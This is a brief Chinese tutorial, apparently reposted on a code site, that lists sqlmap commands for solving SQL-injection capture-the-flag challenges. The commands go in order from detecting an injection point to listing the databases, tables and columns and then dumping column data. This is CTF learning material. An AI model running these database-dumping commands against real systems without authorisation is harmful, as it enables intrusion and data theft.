SQLMAP解决SQL注入CTF题目


1、首先判断是GET 请求还是POST请求

2、GET请求,直接通过URL判断是否存在注入点

sqlmap -u url

3、查询出数据库名称

sqlmap -u url --current-db

4、查询出表名

sqlmap -u url -D 数据库名 --tables

5、查询字段名

sqlmap -u url -D 数据库名 -T 表名 --columns

6、进行爆破

sqlmap -u url -D 数据库名 -T 表名 -C 列名,列名 --dump

 

 

 

  

  


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM